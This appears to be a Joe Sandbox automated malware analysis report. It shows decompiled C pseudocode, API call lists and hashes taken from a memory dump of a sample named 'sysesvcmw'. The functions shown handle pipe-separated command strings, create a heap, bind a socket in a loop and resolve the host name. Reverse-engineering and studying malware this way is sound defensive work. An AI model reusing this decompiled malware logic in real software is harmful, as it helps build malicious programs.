                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1378416451-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e24c9e26e69efa751899c84a214ae5334934a94b20914f31abdf684007cd48cc
                                                                                                                                                                                                                                                                                    • Instruction ID: ed85e8d8bf0ab7ca2f4e313438fe02c3a8f0663c976e0804b297b520842be699
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e24c9e26e69efa751899c84a214ae5334934a94b20914f31abdf684007cd48cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFF01274A40308FBDB10DFA4DC49B8DBB74AB04701F208155FA047B2C0D6B55A418B54
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00405BF0(char* _a4) {
                                                                                                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                                                                                                    				char* _v12;
                                                                                                                                                                                                                                                                                    				char* _v16;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				if( *_a4 != 0x64) {
                                                                                                                                                                                                                                                                                    					if( *_a4 == 0x75) {
                                                                                                                                                                                                                                                                                    						_v16 = _a4 + 2;
                                                                                                                                                                                                                                                                                    						E0040D4F0(_v16, 1);
                                                                                                                                                                                                                                                                                    						_t39 = _t39 + 8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                                                                                    					return E00408C70(_a4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = _a4 + 2;
                                                                                                                                                                                                                                                                                    				while(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v12 = StrChrA(_v8, 0x7c);
                                                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                    						 *_v12 = 0;
                                                                                                                                                                                                                                                                                    						_v12 =  &(_v12[1]);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E0040D4F0(_v8, 0); // executed
                                                                                                                                                                                                                                                                                    					_t39 = _t39 + 8;
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					_v8 = _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L9;
                                                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                                                    0x00405bff
                                                                                                                                                                                                                                                                                    0x00405c60
                                                                                                                                                                                                                                                                                    0x00405c68
                                                                                                                                                                                                                                                                                    0x00405c71
                                                                                                                                                                                                                                                                                    0x00405c76
                                                                                                                                                                                                                                                                                    0x00405c76
                                                                                                                                                                                                                                                                                    0x00405c79
                                                                                                                                                                                                                                                                                    0x00405c88
                                                                                                                                                                                                                                                                                    0x00405c88
                                                                                                                                                                                                                                                                                    0x00405c07
                                                                                                                                                                                                                                                                                    0x00405c0a
                                                                                                                                                                                                                                                                                    0x00405c1c
                                                                                                                                                                                                                                                                                    0x00405c23
                                                                                                                                                                                                                                                                                    0x00405c28
                                                                                                                                                                                                                                                                                    0x00405c31
                                                                                                                                                                                                                                                                                    0x00405c31
                                                                                                                                                                                                                                                                                    0x00405c3a
                                                                                                                                                                                                                                                                                    0x00405c3f
                                                                                                                                                                                                                                                                                    0x00405c47
                                                                                                                                                                                                                                                                                    0x00405c50
                                                                                                                                                                                                                                                                                    0x00405c50
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(00000000,0000007C), ref: 00405C16
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00405C47
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                    • Opcode ID: fc40330d40aa53c54ba93d503f4ad6f3ae25efede43f4d84b526af358aeb2f10
                                                                                                                                                                                                                                                                                    • Instruction ID: 2803cb3e73045f54bc14a94ee58f925885a1025b8c78951dc7d72fe698335800
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc40330d40aa53c54ba93d503f4ad6f3ae25efede43f4d84b526af358aeb2f10
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68115174E04308FBDB04DF94D885BAE7B74EF41309F1080AAE9056B391D679AB80DF55
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00408A60(void* __ecx, void* __edx, intOrPtr _a4, long _a8) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                                                                                                    				if((E00408850() & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    					E004089C0(_t30); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    					_v12 = E00408810(_a4 + 2, 4);
                                                                                                                                                                                                                                                                                    					_t33 =  *0x4163bc; // 0x1e90000
                                                                                                                                                                                                                                                                                    					_t23 = RtlAllocateHeap(_t33, _a8, _v12 + 0xc); // executed
                                                                                                                                                                                                                                                                                    					_v16 = _t23;
                                                                                                                                                                                                                                                                                    					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                    						_v8 = E00408A30(_v16, _v12);
                                                                                                                                                                                                                                                                                    						if((_a8 & 0x00000008) == 0) {
                                                                                                                                                                                                                                                                                    							memset(_v8 + _a4, 0, _v12 - _a4);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    0x00408a60
                                                                                                                                                                                                                                                                                    0x00408a70
                                                                                                                                                                                                                                                                                    0x00408a72
                                                                                                                                                                                                                                                                                    0x00408a72
                                                                                                                                                                                                                                                                                    0x00408a77
                                                                                                                                                                                                                                                                                    0x00408a82
                                                                                                                                                                                                                                                                                    0x00408a95
                                                                                                                                                                                                                                                                                    0x00408aa3
                                                                                                                                                                                                                                                                                    0x00408aaa
                                                                                                                                                                                                                                                                                    0x00408ab0
                                                                                                                                                                                                                                                                                    0x00408ab7
                                                                                                                                                                                                                                                                                    0x00408ac9
                                                                                                                                                                                                                                                                                    0x00408ad2
                                                                                                                                                                                                                                                                                    0x00408ae4
                                                                                                                                                                                                                                                                                    0x00408ae9
                                                                                                                                                                                                                                                                                    0x00408ad2
                                                                                                                                                                                                                                                                                    0x00408ab7
                                                                                                                                                                                                                                                                                    0x00408af2

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00408850: GetCurrentProcessId.KERNEL32(?,00408A6B,?,0040B05E,00000010,?,?,?,?,?,?,0040B17B), ref: 00408853
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(01E90000,?,-0000000C), ref: 00408AAA
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00408AE4
                                                                                                                                                                                                                                                                                      • Part of subcall function 004089C0: HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,00408A77,?,0040B05E,00000010,?,?,?,?,?,?,0040B17B), ref: 004089EC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004089C0: HeapSetInformation.KERNEL32(01E90000,00000000,00000002,00000004), ref: 00408A16
                                                                                                                                                                                                                                                                                      • Part of subcall function 004089C0: GetCurrentProcessId.KERNEL32 ref: 00408A1C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3494217179-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 918da07aa680028be3a046f7582c1784076b1d226c4f3b680462cfcc4b85c13f
                                                                                                                                                                                                                                                                                    • Instruction ID: 8e310b335623aaed64947648ed186bccf68bbf4011d86d547a464b5e017e9876
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 918da07aa680028be3a046f7582c1784076b1d226c4f3b680462cfcc4b85c13f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F11100B5E10108BBCB10EFA5D945B9E7BB8AF44304F00C56EF548AB381DA399A54CF99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                    			E0040BF10(void* __ecx, void* __edi) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				LONG* _v12;
                                                                                                                                                                                                                                                                                    				short _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                                                                                                                                                                    				LONG* _t14;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t27;
                                                                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t28 = __edi;
                                                                                                                                                                                                                                                                                    				_t23 = __ecx;
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_t13 = E0040DD70(__edi);
                                                                                                                                                                                                                                                                                    				_t30 = _t29 + 4;
                                                                                                                                                                                                                                                                                    				_v8 = _t13;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						_t14 = E00409C80(_t23); // executed
                                                                                                                                                                                                                                                                                    						_v12 = _t14;
                                                                                                                                                                                                                                                                                    						if(_v12 != 0 && InterlockedExchangeAdd(_v12, 0) == 0) {
                                                                                                                                                                                                                                                                                    							_v20 = _v12[1];
                                                                                                                                                                                                                                                                                    							_v16 = 0x9e34;
                                                                                                                                                                                                                                                                                    							_t27 =  *0x416e14; // 0x2640ab6
                                                                                                                                                                                                                                                                                    							E0040A0B0(_v8, 0, _t27, 0, 0, E0040BE90,  &_v20); // executed
                                                                                                                                                                                                                                                                                    							_t30 = _t30 + 0x1c;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t23 =  *0x416e0c; // 0x3ac
                                                                                                                                                                                                                                                                                    					} while (WaitForSingleObject(_t23, 0x1388) == 0x102);
                                                                                                                                                                                                                                                                                    					return E0040DD00(_v8, _t28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x0040bf10
                                                                                                                                                                                                                                                                                    0x0040bf10
                                                                                                                                                                                                                                                                                    0x0040bf17
                                                                                                                                                                                                                                                                                    0x0040bf19
                                                                                                                                                                                                                                                                                    0x0040bf1e
                                                                                                                                                                                                                                                                                    0x0040bf21
                                                                                                                                                                                                                                                                                    0x0040bf28
                                                                                                                                                                                                                                                                                    0x0040bf2a
                                                                                                                                                                                                                                                                                    0x0040bf2a
                                                                                                                                                                                                                                                                                    0x0040bf2f
                                                                                                                                                                                                                                                                                    0x0040bf36
                                                                                                                                                                                                                                                                                    0x0040bf4e
                                                                                                                                                                                                                                                                                    0x0040bf56
                                                                                                                                                                                                                                                                                    0x0040bf67
                                                                                                                                                                                                                                                                                    0x0040bf74
                                                                                                                                                                                                                                                                                    0x0040bf79
                                                                                                                                                                                                                                                                                    0x0040bf79
                                                                                                                                                                                                                                                                                    0x0040bf81
                                                                                                                                                                                                                                                                                    0x0040bf8e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040bf98
                                                                                                                                                                                                                                                                                    0x0040bfa1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD70: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BF1E,00000000), ref: 0040DD95
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD70: socket.WS2_32(00000002,00000002,00000011), ref: 0040DDA4
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD70: bind.WS2_32(?,?,00000010), ref: 0040DDE5
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409C80: EnterCriticalSection.KERNEL32(00416DF4), ref: 00409C90
                                                                                                                                                                                                                                                                                      • Part of subcall function 00409C80: LeaveCriticalSection.KERNEL32(00416DF4), ref: 00409CBC
                                                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040BF3E
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000003AC,00001388), ref: 0040BF88
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3920643007-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 19a0958d789b2e919d652272b4e37f6a74e54db78d6ce96edb739a32a7dea317
                                                                                                                                                                                                                                                                                    • Instruction ID: 648c52171a8fbe3fe6feb21857c8d7e76139b4b5e8df0efcfa8b64a264538ae9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a0958d789b2e919d652272b4e37f6a74e54db78d6ce96edb739a32a7dea317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97015E74A00308ABE700EBA4DC46BAF7774EB44704F1081A9E500A72D2E7799E54CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                    			E00409770(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				char _v260;
                                                                                                                                                                                                                                                                                    				char _v261;
                                                                                                                                                                                                                                                                                    				int _v268;
                                                                                                                                                                                                                                                                                    				signed int _v272;
                                                                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v261 = 0;
                                                                                                                                                                                                                                                                                    				_t23 = gethostname( &_v260, 0x100); // executed
                                                                                                                                                                                                                                                                                    				if(_t23 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					__imp__#52( &_v260); // executed
                                                                                                                                                                                                                                                                                    					_v268 = _t23;
                                                                                                                                                                                                                                                                                    					if(_v268 != 0) {
                                                                                                                                                                                                                                                                                    						_v272 = 0;
                                                                                                                                                                                                                                                                                    						while( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)) != 0) {
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v268 + 0xc)) + _v272 * 4)))) != _a4) {
                                                                                                                                                                                                                                                                                    								_v272 = _v272 + 1;
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_v261 = 1;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                                                                    				return _v261;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x00409779
                                                                                                                                                                                                                                                                                    0x0040978c
                                                                                                                                                                                                                                                                                    0x00409795
                                                                                                                                                                                                                                                                                    0x0040979e
                                                                                                                                                                                                                                                                                    0x004097a4
                                                                                                                                                                                                                                                                                    0x004097b1
                                                                                                                                                                                                                                                                                    0x004097b3
                                                                                                                                                                                                                                                                                    0x004097ce
                                                                                                                                                                                                                                                                                    0x004097fa
                                                                                                                                                                                                                                                                                    0x004097c8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004097fc
                                                                                                                                                                                                                                                                                    0x004097fc
                                                                                                                                                                                                                                                                                    0x004097fc
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004097fa
                                                                                                                                                                                                                                                                                    0x004097ce
                                                                                                                                                                                                                                                                                    0x004097b1
                                                                                                                                                                                                                                                                                    0x00409807
                                                                                                                                                                                                                                                                                    0x00409810

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • gethostname.WS2_32(?,00000100), ref: 0040978C
                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 0040979E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: gethostbynamegethostname
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3961807697-0
                                                                                                                                                                                                                                                                                    • Opcode ID: eb893bff08e524b36e97ab5ca210c721b70d17d083af003deee559585d4ddd17
                                                                                                                                                                                                                                                                                    • Instruction ID: 65cb2ebeac570fdb7be8355f4723dba2d2731c0c762421a013589ef226fc7477
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb893bff08e524b36e97ab5ca210c721b70d17d083af003deee559585d4ddd17
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64115A34918218DBCB64DF14CC48BE8B771AB66314F2482EAD48867381C7F8AEC1CF94
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: gethostbynameinet_addr
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1594361348-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 9acd8b2a8a8d593d198362a6ebe3c3f412451466b0b7d0de7c8cc9d5a791ca49
                                                                                                                                                                                                                                                                                    • Instruction ID: 51404770cc1fb97e8cfb6976ea5a0f5fedc69e609ab8221a9dbf76d352b768f8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9acd8b2a8a8d593d198362a6ebe3c3f412451466b0b7d0de7c8cc9d5a791ca49
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26F01C79900208EFCB00DFA5E8888DDBBB4FB48311F60C2A9E905673A0D7749E81DB84
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00409620() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				long _t2;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t1 =  *0x416e0c; // 0x3ac
                                                                                                                                                                                                                                                                                    					_t2 = WaitForSingleObject(_t1, 0x3e8);
                                                                                                                                                                                                                                                                                    					if(_t2 != 0x102) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					if(InterlockedDecrement(0x4143b4) == 0) {
                                                                                                                                                                                                                                                                                    						E00409750(); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t2;
                                                                                                                                                                                                                                                                                    			}





                                                                                                                                                                                                                                                                                    0x00409623
                                                                                                                                                                                                                                                                                    0x00409628
                                                                                                                                                                                                                                                                                    0x0040962e
                                                                                                                                                                                                                                                                                    0x00409639
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00409648
                                                                                                                                                                                                                                                                                    0x0040964a
                                                                                                                                                                                                                                                                                    0x0040964a
                                                                                                                                                                                                                                                                                    0x0040964f
                                                                                                                                                                                                                                                                                    0x00409652

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000003AC,000003E8), ref: 0040962E
                                                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(004143B4), ref: 00409640
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DecrementInterlockedObjectSingleWait
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4086267124-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 478a9d0d562e1264af23f328ca211e277cb6946006caf7cece0c832852851f44
                                                                                                                                                                                                                                                                                    • Instruction ID: 5664ed682fcd5090606154bfc7ee4006f242b32a92ea5b5f5687bbc862b9098a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 478a9d0d562e1264af23f328ca211e277cb6946006caf7cece0c832852851f44
